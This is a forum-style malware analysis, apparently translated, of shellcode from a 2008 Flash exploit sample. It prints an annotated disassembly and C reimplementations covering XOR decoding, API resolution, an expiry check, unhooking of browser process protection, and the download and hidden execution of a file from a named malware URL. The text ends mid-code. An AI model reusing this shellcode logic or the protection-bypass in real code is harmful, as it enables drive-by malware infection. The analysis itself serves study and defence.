Analysis of the shellcode used in the Flash vulnerability exploit - Vulnerability Warning - Black Bar Safety Net

2008-06-03T00:00:00
ID MYHACK58:62200819240
Type myhack58
Reporter Anonymous (佚名)
Modified 2008-06-03T00:00:00

Description

Title: [Original] Analysis of the shellcode used in the Flash vulnerability exploit   Author: Regulus small Cong   Time: 2008-06-02 19:29   Link: http://bbs.pediy.com/showthread.php?t=65907

Author's home page: http://hi.baidu.com/yicong2007   Purpose: purely for learning; do not use for malicious purposes.

In recent days web exploits ("net horses") for the Flash vulnerability have become very popular, so I wanted to analyze how the shellcode runs.

But my ability is limited, and it is hard for me to do what the experts do: locate the vulnerable code and observe the whole overflow process. So I can only do the back half of the work, that is, look at what the shellcode in the malformed Flash file actually does once it is up and running.

What I used was a sample captured from a website, win 9,0,115,0 ie.swf (the name apparently records the targeted Flash Player build, 9,0,115,0, under IE). The shellcode is easy to find in the malformed .swf file: it starts at file offset 0xEB. I copied this section of shellcode to the entry point of an executable file so that I could debug the shellcode directly in OllyDbg (OD).

While debugging I found that this Flash vulnerability gives the shellcode writer a very generous amount of space to play with. I saw a shellcode more complex than any I had seen in an ActiveX vulnerability exploit.

The shellcode's functionality is very comprehensive. Besides the usual shellcode XOR decryption, API address resolution, and download-and-run of the malware, it performs additional operations that make it more robust and practical. These operations include:

1. An expiry time for the shellcode: if the system time is found to be later than a fixed time stored in the shellcode, it calls ExitThread directly. This was probably done by whoever sells the Flash web-exploit generator, possibly for commercial reasons, to stop others from producing their own usable file by simply patching the malware URL.

2. It takes the addresses of ZwCreateProcessEx and ZwWriteVirtualMemory from the import table of kernel32.dll, inline-hooks those two addresses to its own saved copy of the corresponding original code, and restores the first few bytes of CreateProcessInternalW, which have also been inline-hooked. These operations counter the process-execution protection that browsers such as Maxthon implement by hooking exactly those APIs. The method has been proposed for a long time and is well known, but in earlier web exploits the available buffer was not big enough to add this extra code, so I had never seen hook restoration used against browser protection in practice. This time I finally saw a real example.

3. It uses CreateProcessInternalA to execute the downloaded malware file; previous shellcodes generally used WinExec.

Below is the analysis of the shellcode's execution flow. Most of the analysis is in the comments; the labels (1), (2), ... in the comments give the order of execution, so following the labels makes the whole process easy to understand. (The key names in the comments are OllyDbg's: F7 step into, F8 step over, F4 run to cursor, F9 run.)

It starts with XOR decryption. Each 16-bit word is XORed with a key that starts at 0x4522 and is incremented by one for every word (inc eax), over 0x162 words, i.e. 708 bytes.

00407000  EB 16            jmp short 00407018            ; (1) F8
00407002  5B               pop ebx                       ; (3) ebx = start of the encrypted code
00407003  33C9             xor ecx, ecx
00407005  66:B8 2245       mov ax, 4522
00407009  66:31044B        xor word ptr [ebx+ecx*2], ax  ; xor decryption
0040700D  41               inc ecx
0040700E  40               inc eax                       ; the key changes every word
0040700F  66:81F9 6201     cmp cx, 162
00407014  7C F3            jl short 00407009             ; (4) loop; F4 on the next instruction
00407016  EB 05            jmp short 0040701D            ; (5) then F8, jump into the decrypted code
00407018  E8 E5FFFFFF      call 00407002                 ; (2) F7
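The decoder implied by the stub above, written out as an added example (this is not code from the original post or from the sample). It applies the same loop as 00407009..00407014: word i is XORed with 0x4522 + i. The two-word input is constructed for the example and chosen so that it decodes to E9 65 02 00, the start of the jmp that begins the decrypted code at 0040701D; the real 0x162-word buffer is not embedded.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define SC_WORDS 0x162    /* cmp cx, 162: 354 words = 708 bytes */
#define SC_KEY0  0x4522   /* mov ax, 4522 */

/* Key for word i: ax starts at SC_KEY0 and is incremented once per iteration. */
uint16_t sc_key(size_t i) { return (uint16_t)(SC_KEY0 + i); }

/* Little-endian 16-bit read, as the x86 "xor word ptr" sees the buffer. */
uint16_t word_at(const uint8_t *b, size_t i)
{
    return (uint16_t)(b[2 * i] | (b[2 * i + 1] << 8));
}

/* xor word ptr [ebx+ecx*2], ax over nwords words. XOR is its own inverse,
 * so the same call both encodes and decodes. */
void rolling_xor(uint8_t *buf, size_t nwords, uint16_t key0)
{
    for (size_t i = 0; i < nwords; i++) {
        uint16_t w = (uint16_t)(word_at(buf, i) ^ (uint16_t)(key0 + i));
        buf[2 * i]     = (uint8_t)(w & 0xFF);
        buf[2 * i + 1] = (uint8_t)(w >> 8);
    }
}

/* Constructed two-word sample (not the real shellcode bytes). */
uint8_t demo_encoded[4] = {0xCB, 0x20, 0x21, 0x45};
uint8_t demo_decoded[4];

/* Decode the constructed sample into demo_decoded; returns the word count. */
size_t demo_decode(void)
{
    memcpy(demo_decoded, demo_encoded, sizeof demo_encoded);
    rolling_xor(demo_decoded, 2, SC_KEY0);
    return 2;
}

int main(void)
{
    demo_decode();
    printf("decoded:");
    for (size_t i = 0; i < sizeof demo_decoded; i++)
        printf(" %02X", demo_decoded[i]);
    printf("\n");   /* decoded: E9 65 02 00 */
    return 0;
}
```

To decode the real sample, point rolling_xor at the bytes that follow the stub (file offset 0xEB + 0x1D in the .swf, or 0040701D in the debugger) with nwords = SC_WORDS; the first instruction that appears should be the jmp 00407287 shown next.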

Next comes the decrypted code itself.

The first step is to obtain the addresses of the kernel32.dll API functions and fill them into the data area that follows. This is the usual method: get the kernel32.dll base address through the PEB, then walk its export table, run each function name string through a hash, compare the result with the stored value, and take the matching function's address.

0040701D  E9 65020000      jmp 00407287                  ; (6) start of the decrypted code: jump to the end
00407022  5F               pop edi                       ; (8) get its own address; edi is now the data area address
00407023  6A 30            push 30
00407025  59               pop ecx
00407026  64:8B01          mov eax, dword ptr fs:[ecx]   ; PEB
00407029  8B98 A8000000    mov ebx, dword ptr [eax+A8]   ; PEB.OSMinorVersion: 0 = Windows 2000, 1 = XP, 2 = 2003
0040702F  8B40 0C          mov eax, dword ptr [eax+C]    ; PEB.Ldr
00407032  8B70 1C          mov esi, dword ptr [eax+1C]   ; InInitializationOrderModuleList
00407035  AD               lods dword ptr [esi]          ; second entry (kernel32.dll)
00407036  8B68 08          mov ebp, dword ptr [eax+8]    ; (9) kernel32.dll base address into ebp
00407039  8BF7             mov esi, edi
0040703B  81EC 00020000    sub esp, 200
00407041  85DB             test ebx, ebx
00407043  75 07            jnz short 0040704C            ; (10) Windows 2000 or XP? Mine is XP, so it jumps straight on
00407045  C746 24 C9525E53 mov dword ptr [esi+24], 535E52C9 ; on 2000, replace the hash at 0x24 (presumably ZwCreateProcess, since 2000 has no ZwCreateProcessEx)
0040704C  6A 09            push 9
0040704E  59               pop ecx
0040704F  E8 EE010000      call 00407242                 ; (11) F8 over this: for each of the nine hashes at the start of the data area, walk the export table for the matching function and overwrite the hash with the function's address
00407054  E2 F9            loopd short 0040704F          ; loop; F4 on the next instruction

The API addresses are filled in at the following offsets relative to esi (the later calls are of the form call [esi+XX], where XX is one of these):
0x00 LoadLibraryA
0x04 GetTempPathA
0x08 DeleteFileA
0x0C CreateProcessInternalA
0x10 ExitThread
0x14 VirtualProtect
0x18 CreateProcessInternalW
0x1C CompareFileTime
0x20 GetSystemTimeAsFileTime

Next it scans memory for the location of a "retn" instruction (actually any 0xC3 byte; it need not be a real retn) for use in the anti-debugging trick later.

00407056  40               inc eax                       ; eax = GetSystemTimeAsFileTime, the last address resolved
00407057  8038 C3          cmp byte ptr [eax], 0C3
0040705A  75 FA            jnz short 00407056            ; (12) loop scanning memory for the byte; the borrowed retn is used to redirect program flow as anti-debugging
0040705C  8946 30          mov dword ptr [esi+30], eax   ; the address found here was 7C801881

Then it walks kernel32.dll's import table to obtain the addresses of two native API functions.

0040705F  6A 02            push 2
00407061  59               pop ecx
00407062  E8 9E010000      call 00407205                 ; this time the import table is searched for the function address
00407067  E2 F9            loopd short 00407062

The addresses obtained here are stored at these offsets relative to esi (again accessed later as [esi+XX]):
0x24 ZwCreateProcessEx
0x28 ZwWriteVirtualMemory

Next it uses LoadLibraryA to load urlmon.dll and obtains the address of URLDownloadToFileA. It is worth noting that LoadLibraryA is not called directly: a sub-function first pushes the return address and then jmps to it.

00407069  6A 01            push 1
0040706B  59               pop ecx
0040706C  68 6F6E0000      push 6E6F
00407071  68 75726C6D      push 6D6C7275
00407076  54               push esp                      ; "urlmon"
00407077  8B06             mov eax, dword ptr [esi]      ; LoadLibraryA
00407079  E8 10010000      call 0040718E                 ; (13) a sub-function that exists purely for anti-debugging; put a breakpoint on the next instruction and F9, and it will not run away
0040707E  95               xchg eax, ebp                 ; urlmon.dll base address into ebp
0040707F  E8 BE010000      call 00407242                 ; (14) find the function address and store it; F8 over it. The function found is URLDownloadToFileA

The URLDownloadToFileA address is stored at [esi+2C].

Before getting into the substantive work come the additional operations.

First, the expiry-time check:

00407084  68 3D400000      push 403D
00407089  6A FF            push -1
0040708B  6A FF            push -1
0040708D  3E:DB2C24        fld tbyte ptr ds:[esp]
00407091  50               push eax                      ; make room on the stack for a FILETIME structure
00407092  50               push eax
00407093  54               push esp
00407094  FF56 20          call dword ptr [esi+20]       ; GetSystemTimeAsFileTime
00407097  8BC4             mov eax, esp
00407099  68 6EC2C801      push 1C8C26E                  ; the stored limit, FILETIME 0x01C8C26E36B3C000
0040709E  68 00C0B336      push 36B3C000
004070A3  54               push esp
004070A4  50               push eax
004070A5  FF56 1C          call dword ptr [esi+1C]       ; CompareFileTime(now, limit)
004070A8  48               dec eax
004070A9  75 03            jnz short 004070AE            ; (16) if the system time is later than the stored time, do not jump ...
004070AB  FF56 10          call dword ptr [esi+10]       ; ... but call ExitThread directly. This is the shellcode's expiry

CompareFileTime returns 1 only when the first time is later than the second, so dec eax leaves zero exactly in the expired case. The stored value 0x01C8C26E36B3C000 is 2008-05-30 16:00:00 UTC, i.e. midnight on 31 May 2008 in UTC+8.

When I was debugging, the time had already passed, so it would have gone straight to ExitThread; you can manually change EIP to the next instruction so that it does not exit and carry on debugging.
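The expiry check re-implemented in plain C, as an added example (not code from the original post or the sample). The FILETIME constant comes from the two pushes in the listing; the comparison reproduces CompareFileTime's -1/0/1 contract and the "dec eax; jnz" decision, and the conversion to Unix time is what produces the 31 May 2008 (UTC+8) expiry date quoted above.

```c
#include <stdint.h>
#include <stdio.h>
#include <time.h>

/* 100-ns ticks between 1601-01-01 (FILETIME epoch) and 1970-01-01 (Unix epoch). */
#define EPOCH_DIFF_100NS 116444736000000000ULL

/* push 1C8C26E; push 36B3C000 -> high:low dwords of the stored limit. */
const uint64_t SC_EXPIRY_FILETIME = 0x01C8C26E36B3C000ULL;

/* Same contract as Win32 CompareFileTime: -1 (a < b), 0 (equal), 1 (a > b). */
int compare_filetime(uint64_t a, uint64_t b)
{
    return (a < b) ? -1 : (a > b) ? 1 : 0;
}

/* 1 if the shellcode would call ExitThread for this system time.
 * "dec eax; jnz continue" falls through into ExitThread only when eax was 1,
 * so a time exactly equal to the limit still runs. */
int sc_expired(uint64_t now_filetime)
{
    int eax = compare_filetime(now_filetime, SC_EXPIRY_FILETIME);
    return (eax - 1) == 0;
}

/* FILETIME (100 ns since 1601) -> seconds since the Unix epoch. */
int64_t filetime_to_unix(uint64_t ft)
{
    return (int64_t)((ft - EPOCH_DIFF_100NS) / 10000000ULL);
}

uint64_t unix_to_filetime(int64_t t)
{
    return (uint64_t)t * 10000000ULL + EPOCH_DIFF_100NS;
}

int main(void)
{
    int64_t secs = filetime_to_unix(SC_EXPIRY_FILETIME);
    time_t t = (time_t)secs;
    char buf[40];
    strftime(buf, sizeof buf, "%Y-%m-%d %H:%M:%S UTC", gmtime(&t));
    printf("shellcode expiry: %s (unix %lld)\n", buf, (long long)secs);
    printf("one second before: expired=%d\n", sc_expired(unix_to_filetime(secs - 1)));
    printf("one second after:  expired=%d\n", sc_expired(unix_to_filetime(secs + 1)));
    return 0;
}
```

When debugging an expired sample, the equivalent of the EIP edit described above is to make sc_expired return 0; in the debugger the same thing is achieved by skipping the call at 004070AB.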

The next part is what surprised me, and it is what I mentioned earlier: the shellcode carries its own copies of the native API code, inline-hooks the native APIs to jump to this carried code, and restores the first few bytes of CreateProcessInternalW. This defeats the execution protection of some browser software and clears the way for its own download-and-run of the malware. This is what makes it better than the exploit shellcodes I had seen before.

First, the carried native API code is copied to the space behind the PEB. The reason for copying it there, I think, is stability: if the inline hook pointed directly into the shellcode, then once the shellcode has finished and its buffer has been freed, the next call to the corresponding native API would crash. Copying the code into the space behind the PEB guarantees that the address is still accessible after the shellcode exits, so the program keeps running normally, or at least appears to.

004070AE  6A 30            push 30
004070B0  59               pop ecx
004070B1  64:8B19          mov ebx, dword ptr fs:[ecx]   ; PEB
004070B4  8DAB 00040000    lea ebp, dword ptr [ebx+400]  ; (17) a piece of unused memory behind the PEB structure
004070BA  8B9B A8000000    mov ebx, dword ptr [ebx+A8]   ; PEB.OSMinorVersion again
004070C0  8BFD             mov edi, ebp
004070C2  56               push esi
004070C3  E9 E0000000      jmp 004071A8                  ; (18) jump down
004070C8  5E               pop esi                       ; (20) jump back here; esi = address of the carried native API code
004070C9  F3:A5            rep movs dword ptr es:[edi], dword ptr [esi] ; copy the 0x30 dwords of carried native API stubs into this memory for the inline hook
004070CB  5E               pop esi

Next, the first bytes at the ZwCreateProcessEx and ZwWriteVirtualMemory addresses "found" above are overwritten with a "push XXX; retn" that jumps to the copied code. ebx (OSMinorVersion) picks which of three stubs to use: offset 0 for Windows 2000, 1 for XP, 2 for 2003:

004070CC  8B7E 24          mov edi, dword ptr [esi+24]   ; ZwCreateProcessEx
004070CF  E8 25010000      call 004071F9                 ; VirtualProtect the function header, 0x20 bytes, PAGE_READWRITE
004070D4  6A 1A            push 1A                       ; stub offset for 2003
004070D6  6A 0D            push 0D                       ; stub offset for XP
004070D8  6A 00            push 0                        ; stub offset for 2000
004070DA  8BC5             mov eax, ebp
004070DC  03049C           add eax, dword ptr [esp+ebx*4] ; eax = copied stub for this OS
004070DF  C607 68          mov byte ptr [edi], 68        ; "push ..."
004070E2  47               inc edi
004070E3  AB               stos dword ptr es:[edi]       ; ... address of the copied code
004070E4  C607 C3          mov byte ptr [edi], 0C3       ; "retn"
004070E7  8B7E 28          mov edi, dword ptr [esi+28]   ; ZwWriteVirtualMemory
004070EA  E8 0A010000      call 004071F9
004070EF  6A 3D            push 3D                       ; 2003
004070F1  6A 36            push 36                       ; XP
004070F3  6A 27            push 27                       ; 2000
004070F5  8BC5             mov eax, ebp
004070F7  03049C           add eax, dword ptr [esp+ebx*4]
004070FA  C607 68          mov byte ptr [edi], 68
004070FD  47               inc edi
004070FE  AB               stos dword ptr es:[edi]
004070FF  C607 C3          mov byte ptr [edi], 0C3

Why do I particularly stress "the ZwCreateProcessEx and ZwWriteVirtualMemory addresses it found"? We must not forget that this approach targets particular software. Which software? I think it is Maxthon 2.

Searching for articles on how the Maxthon 2 browser implements its protection shows that Maxthon 2 IAT-hooks ZwCreateProcessEx and ZwWriteVirtualMemory. Now, the shellcode takes the ZwCreateProcessEx and ZwWriteVirtualMemory addresses from kernel32.dll's import table. What does that mean? My bold guess: when Maxthon 2 visits the exploit page, the shellcode runs inside its process, so when the shellcode reads the addresses out of kernel32.dll's import table it gets the hooked results, which point straight into Maxthon 2's DLL. That is deliberate on the part of the shellcode author, because it then inline-hooks the code at those two addresses so that control actually goes back to the original code. Maxthon 2 is thus completely unaware that its IAT hook has failed, and its execution protection is bypassed. The next action further confirms this: the code at the start of CreateProcessInternalW is also restored, presumably because Maxthon 2 inline-hooks CreateProcessInternalW as well.

00407102  8B7E 18          mov edi, dword ptr [esi+18]   ; CreateProcessInternalW
00407105  E8 EF000000      call 004071F9
0040710A  68 68080A00      push 0A0868                   ; original first four bytes, selected by ebx: 68 08 0A 00 (2003)
0040710F  68 68080A00      push 0A0868                   ; 68 08 0A 00 (XP)
00407114  68 558BEC6A      push 6AEC8B55                 ; 55 8B EC 6A (2000)
00407119  8B049C           mov eax, dword ptr [esp+ebx*4]
0040711C  AB               stos dword ptr es:[edi]       ; restore the first four bytes, undoing the inline hook
0040711D  33C0             xor eax, eax
0040711F  50               push eax                      ; fifth byte: 00 (2003)
00407120  50               push eax                      ; 00 (XP)
00407121  6A FF            push -1                       ; FF (2000)
00407123  8B049C           mov eax, dword ptr [esp+ebx*4]
00407126  AA               stos byte ptr es:[edi]        ; restore the fifth byte

So the five bytes written are 55 8B EC 6A FF (push ebp; mov ebp, esp; push -1) on Windows 2000 and 68 08 0A 00 00 (push 0A08) on XP and 2003, the original prologue of CreateProcessInternalW; five bytes is exactly the size of the jmp rel32 that an inline hook places there.
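The patch form used above, and the inverse check a protection product (or an incident responder looking at a process dump) would run, as an added example; this is not code from the original post or from Maxthon. write_push_ret emits the same six bytes the shellcode stores at 004070DF..004070E4; classify_entry recognizes both that form and the ordinary five-byte jmp rel32 detour and recovers where it leads, so that a detour pointing outside the owning module (here, into the page behind the PEB) can be flagged. All addresses and byte strings are constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

enum entry_kind { ENTRY_OTHER = 0, ENTRY_JMP_REL32 = 1, ENTRY_PUSH_RET = 2 };

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Write the same 6 bytes the shellcode stores at the API entry: 68 <imm32> C3. */
size_t write_push_ret(uint8_t *entry, uint32_t target)
{
    entry[0] = 0x68;                      /* mov byte ptr [edi], 68 */
    entry[1] = (uint8_t)(target);         /* stos dword, little-endian */
    entry[2] = (uint8_t)(target >> 8);
    entry[3] = (uint8_t)(target >> 16);
    entry[4] = (uint8_t)(target >> 24);
    entry[5] = 0xC3;                      /* mov byte ptr [edi], 0C3 */
    return 6;
}

/* Classify the bytes at a function entry whose virtual address is `va`
 * and recover the detour target when there is one. */
enum entry_kind classify_entry(const uint8_t *entry, uint32_t va, uint32_t *target)
{
    if (entry[0] == 0xE9) {                       /* jmp rel32: the usual 5-byte detour */
        *target = va + 5 + rd32(entry + 1);
        return ENTRY_JMP_REL32;
    }
    if (entry[0] == 0x68 && entry[5] == 0xC3) {   /* push imm32; retn: what this sample writes */
        *target = rd32(entry + 1);
        return ENTRY_PUSH_RET;
    }
    *target = 0;
    return ENTRY_OTHER;
}

int entry_kind_of(const uint8_t *entry, uint32_t va)
{
    uint32_t t;
    return (int)classify_entry(entry, va, &t);
}

uint32_t entry_target_of(const uint8_t *entry, uint32_t va)
{
    uint32_t t;
    classify_entry(entry, va, &t);
    return t;
}

/* A detour whose target is outside [base, base+size) of the module that owns
 * the function (ntdll/kernel32) is the signature of an inline hook. */
int detour_leaves_module(uint32_t target, uint32_t mod_base, uint32_t mod_size)
{
    return target < mod_base || target - mod_base >= mod_size;
}

/* Constructed samples, not captured from a live process. */
uint8_t demo_prologue[8] = {0x55, 0x8B, 0xEC, 0x6A, 0xFF, 0x90, 0x90, 0x90}; /* push ebp; mov ebp,esp; push -1 */
uint8_t demo_jmp[8]      = {0xE9, 0xFB, 0xFF, 0xFF, 0xFF, 0x90, 0x90, 0x90}; /* jmp to itself (rel32 = -5) */

int main(void)
{
    uint32_t t;
    const uint32_t fake_ntdll_base = 0x7C900000u, fake_ntdll_size = 0xB0000u; /* assumed layout */
    write_push_ret(demo_prologue, 0x7FFDF400u);     /* "PEB + 0x400" as an assumed address */
    printf("kind=%d target=%08X leaves module=%d\n",
           classify_entry(demo_prologue, 0x7C901000u, &t), t,
           detour_leaves_module(t, fake_ntdll_base, fake_ntdll_size));
    return 0;
}
```

Reading the target alone is not enough to tell a legitimate protection hook from this shellcode's re-hook: both leave the module. What distinguishes the latter is that the target lies in the PEB's page rather than in any loaded image, which is the check to add on top of detour_leaves_module when walking a real process.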

With these operations done, the shellcode finally gets to its substantive work.

First, it gets the Temp folder path and appends "orz.exe" to form the local path of the malware file.

00407127  8DBE 33010000    lea edi, dword ptr [esi+133]
0040712D  57               push edi
0040712E  68 FF000000      push 0FF
00407133  FF56 04          call dword ptr [esi+4]        ; GetTempPathA
00407136  03C7             add eax, edi                  ; eax = end of the temp path; append the file name there
00407138  C700 6F727A2E    mov dword ptr [eax], 2E7A726F ; "orz."
0040713E  C740 04 65786500 mov dword ptr [eax+4], 657865 ; "exe\0", giving "orz.exe"

To be safe, it first tries to delete the file at that path.

00407145  57               push edi
00407146  FF56 08          call dword ptr [esi+8]        ; DeleteFileA

Then it calls URLDownloadToFileA directly to download the malware file from the remote address http://www.0x4f.cn/test.exe to orz.exe.

00407149  33DB             xor ebx, ebx
0040714B  53               push ebx                      ; lpfnCB = NULL
0040714C  53               push ebx                      ; dwReserved = 0
0040714D  57               push edi                      ; szFileName = the orz.exe path
0040714E  8D46 34          lea eax, dword ptr [esi+34]   ; the URL "http://www.0x4f.cn/test.exe"
00407151  50               push eax                      ; szURL
00407152  53               push ebx                      ; pCaller = NULL
00407153  FF56 2C          call dword ptr [esi+2C]       ; URLDownloadToFileA

Finally, the shellcode executes the downloaded file; note that it uses CreateProcessInternalA. Since the protection on CreateProcessInternalW, ZwCreateProcessEx and ZwWriteVirtualMemory has already been cleared, the malware author is confident that using CreateProcessInternalA here is very likely to succeed.

00407156  33C0             xor eax, eax
00407158  8BFC             mov edi, esp
0040715A  6A 12            push 12
0040715C  59               pop ecx
0040715D  AB               stos dword ptr es:[edi]
0040715E  E2 FD            loopd short 0040715D          ; loop: zero 0x12 dwords on the stack for the structures
00407160  66:C74424 3C 0101 mov word ptr [esp+3C], 101   ; STARTUPINFO.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW, wShowWindow left 0 (SW_HIDE)
00407167  8BFC             mov edi, esp
00407169  8D47 10          lea eax, dword ptr [edi+10]
0040716C  51               push ecx                      ; phNewToken = NULL (ecx is 0 after the loop)
0040716D  57               push edi                      ; lpProcessInformation
0040716E  50               push eax                      ; lpStartupInfo = esp+10
0040716F  51               push ecx                      ; lpCurrentDirectory
00407170  51               push ecx                      ; lpEnvironment
00407171  51               push ecx                      ; dwCreationFlags
00407172  51               push ecx                      ; bInheritHandles
00407173  51               push ecx                      ; lpThreadAttributes
00407174  51               push ecx                      ; lpProcessAttributes
00407175  51               push ecx                      ; lpCommandLine
00407176  8D96 33010000    lea edx, dword ptr [esi+133]  ; local path of orz.exe
0040717C  52               push edx                      ; lpApplicationName
0040717D  51               push ecx                      ; hToken
0040717E  FF56 0C          call dword ptr [esi+C]        ; CreateProcessInternalA
00407181  81C4 54020000    add esp, 254
00407187  61               popad
00407188  FF71 EC          push dword ptr [ecx-14]       ; this should jump back to the original overflow location and let the program carry on normally
0040718B  C2 0400          retn 4

With STARTUPINFO at esp+10, the word written at esp+3C is its dwFlags, so the malware is started without a visible window.

What follows are the sub-functions and data used by the code above.

First, the function that simulates a call:

0040718E  8B56 30          mov edx, dword ptr [esi+30]   ; called at (13); edx = the "retn" address found earlier
00407191  41               inc ecx
00407192  5B               pop ebx                       ; the call's return address
00407193  52               push edx
00407194  03E1             add esp, ecx
00407196  03E1             add esp, ecx
00407198  03E1             add esp, ecx
0040719A  03E1             add esp, ecx
0040719C  83EC 04          sub esp, 4
0040719F  5A               pop edx
004071A0  53               push ebx
004071A1  8BDA             mov ebx, edx
004071A3  E2 F7            loopd short 0040719C
004071A5  52               push edx                      ; push the return address, which here is just a retn instruction
004071A6  FFE0             jmp eax                       ; jmp to the start of the API function

Next, the one in the middle used to locate itself and return:

004071A8  E8 1BFFFFFF      call 004070C8                 ; (19) call back to put the address of the following code on the stack and jump back; must F7 here

Then the carried copies of the native API code: one stub each for Windows 2000 / XP / 2003 for ZwCreateProcessEx and for ZwWriteVirtualMemory, at the offsets selected by ebx above:

004071AD  6A 29            push 29                       ; offset 0x00: Windows 2000, service 0x29 via int 2E
004071AF  58               pop eax
004071B0  36:8D5424 04     lea edx, dword ptr ss:[esp+4]
004071B5  CD 2E            int 2E
004071B7  C2 2000          retn 20
004071BA  6A 30            push 30                       ; offset 0x0D: XP, NtCreateProcessEx = 0x30 via SharedUserData!SystemCallStub
004071BC  58               pop eax
004071BD  BA 0003FE7F      mov edx, 7FFE0300
004071C2  FF12             call dword ptr [edx]
004071C4  C2 2000          retn 20
004071C7  6A 32            push 32                       ; offset 0x1A: 2003, NtCreateProcessEx = 0x32
004071C9  58               pop eax
004071CA  BA 0003FE7F      mov edx, 7FFE0300
004071CF  FF12             call dword ptr [edx]
004071D1  C2 2400          retn 24
004071D4  B8 F0000000      mov eax, 0F0                  ; offset 0x27: Windows 2000, NtWriteVirtualMemory = 0xF0 via int 2E
004071D9  36:8D5424 04     lea edx, dword ptr ss:[esp+4]
004071DE  CD 2E            int 2E
004071E0  C2 1400          retn 14
004071E3  B8 15010000      mov eax, 115                  ; offset 0x36: XP, NtWriteVirtualMemory = 0x115
004071E8  EB 05            jmp short 004071EF
004071EA  B8 1F010000      mov eax, 11F                  ; offset 0x3D: 2003, NtWriteVirtualMemory = 0x11F
004071EF  BA 0003FE7F      mov edx, 7FFE0300
004071F4  FF12             call dword ptr [edx]
004071F6  C2 1400          retn 14

Next, the sub-function that uses VirtualProtect to change the page protection of the API function entry:

004071F9  52               push edx
004071FA  54               push esp                      ; lpflOldProtect
004071FB  6A 04            push 4                        ; PAGE_READWRITE
004071FD  6A 20            push 20                       ; dwSize = 0x20
004071FF  57               push edi                      ; lpAddress = the function entry
00407200  FF56 14          call dword ptr [esi+14]       ; VirtualProtect: make the first 0x20 bytes of the function writable
00407203  5A               pop edx
00407204  C3               retn

Next, the walk of kernel32.dll's import table to find the native API addresses. This is the common routine many shellcodes share, so I was too lazy to comment it again.

00407205  51               push ecx
00407206  8B45 3C          mov eax, dword ptr [ebp+3C]   ; e_lfanew
00407209  45               inc ebp
0040720A  8B5C28 7F        mov ebx, dword ptr [eax+ebp+7F] ; = [PE header+80]: import directory RVA
0040720E  4D               dec ebp
0040720F  03DD             add ebx, ebp                  ; first IMAGE_IMPORT_DESCRIPTOR (kernel32 imports only ntdll)
00407211  8B13             mov edx, dword ptr [ebx]      ; OriginalFirstThunk
00407213  03D5             add edx, ebp
00407215  33C9             xor ecx, ecx
00407217  49               dec ecx
00407218  41               inc ecx                       ; next imported name
00407219  8B048A           mov eax, dword ptr [edx+ecx*4] ; IMAGE_IMPORT_BY_NAME RVA
0040721C  8D4428 02        lea eax, dword ptr [eax+ebp+2] ; its Name field
00407220  60               pushad
00407221  33C9             xor ecx, ecx
00407223  0FBE10           movsx edx, byte ptr [eax]     ; hash the name: ecx = ror(ecx, 7) + byte, until NUL
00407226  3AD6             cmp dl, dh
00407228  74 08            je short 00407232
0040722A  C1C9 07          ror ecx, 7
0040722D  03CA             add ecx, edx
0040722F  40               inc eax
00407230  EB F1            jmp short 00407223
00407232  390F             cmp dword ptr [edi], ecx      ; compare with the stored hash
00407234  61               popad
00407235  75 E1            jnz short 00407218
00407237  8B43 10          mov eax, dword ptr [ebx+10]   ; FirstThunk, i.e. the IAT
0040723A  03C5             add eax, ebp
0040723C  8B0488           mov eax, dword ptr [eax+ecx*4] ; whatever the IAT slot currently holds, hooked or not
0040723F  AB               stos dword ptr es:[edi]       ; overwrite the hash with it
00407240  59               pop ecx
00407241  C3               retn

The last piece of code is the sub-function that walks a PE file's export table to get an API function's address. It is the same generic module, and again I was too lazy to comment it for the Nth time:

00407242  51               push ecx
00407243  56               push esi
00407244  8B75 3C          mov esi, dword ptr [ebp+3C]   ; e_lfanew
00407247  8B742E 78        mov esi, dword ptr [esi+ebp+78] ; export directory RVA
0040724B  03F5             add esi, ebp
0040724D  56               push esi
0040724E  8B76 20          mov esi, dword ptr [esi+20]   ; AddressOfNames
00407251  03F5             add esi, ebp
00407253  33C9             xor ecx, ecx
00407255  49               dec ecx
00407256  41               inc ecx                       ; next exported name
00407257  AD               lods dword ptr [esi]
00407258  03C5             add eax, ebp
0040725A  33DB             xor ebx, ebx
0040725C  0FBE10           movsx edx, byte ptr [eax]     ; same hash: ebx = ror(ebx, 7) + byte, until NUL
0040725F  3AD6             cmp dl, dh
00407261  74 08            je short 0040726B
00407263  C1CB 07          ror ebx, 7
00407266  03DA             add ebx, edx
00407268  40               inc eax
00407269  EB F1            jmp short 0040725C
0040726B  3B1F             cmp ebx, dword ptr [edi]      ; compare with the stored hash
0040726D  75 E7            jnz short 00407256
0040726F  5E               pop esi
00407270  8B5E 24          mov ebx, dword ptr [esi+24]   ; AddressOfNameOrdinals
00407273  03DD             add ebx, ebp
00407275  66:8B0C4B        mov cx, word ptr [ebx+ecx*2]
00407279  8B5E 1C          mov ebx, dword ptr [esi+1C]   ; AddressOfFunctions
0040727C  03DD             add ebx, ebp
0040727E  8B048B           mov eax, dword ptr [ebx+ecx*4]
00407281  03C5             add eax, ebp
00407283  AB               stos dword ptr es:[edi]       ; overwrite the hash with the function address
00407284  5E               pop esi
00407285  59               pop ecx
00407286  C3               retn
00407287  E8 96FDFFFF      call 00407022                 ; (7) call back; F7 here
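The name hash shared by the two lookup routines above (00407223..00407230 and 0040725C..00407269), together with the table walk that compares it against a stored value, re-implemented as an added example; this is not code from the original post or the sample. The routine walks a constructed array standing in for AddressOfNames / OriginalFirstThunk instead of a real module, and the demo_names table is an assumption made for the example. Running it prints the constants that the data area must have held for each API the shellcode resolves.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

static uint32_t ror32(uint32_t v, unsigned n)
{
    n &= 31;
    return n ? (v >> n) | (v << (32 - n)) : v;
}

/* The shellcode's hash: h = 0; for each byte c until NUL: h = ror(h, 7) + c.
 * The byte is sign-extended (movsx); for ASCII names that equals zero-extension. */
uint32_t sc_hash(const char *name)
{
    uint32_t h = 0;
    for (const char *p = name; *p; p++)
        h = ror32(h, 7) + (uint32_t)(int32_t)(signed char)*p;
    return h;
}

/* Walk a name table and return the index whose hash equals `want`, or -1.
 * In the sample the table is AddressOfNames (exports) or the names behind
 * OriginalFirstThunk (imports); the index then selects the address. */
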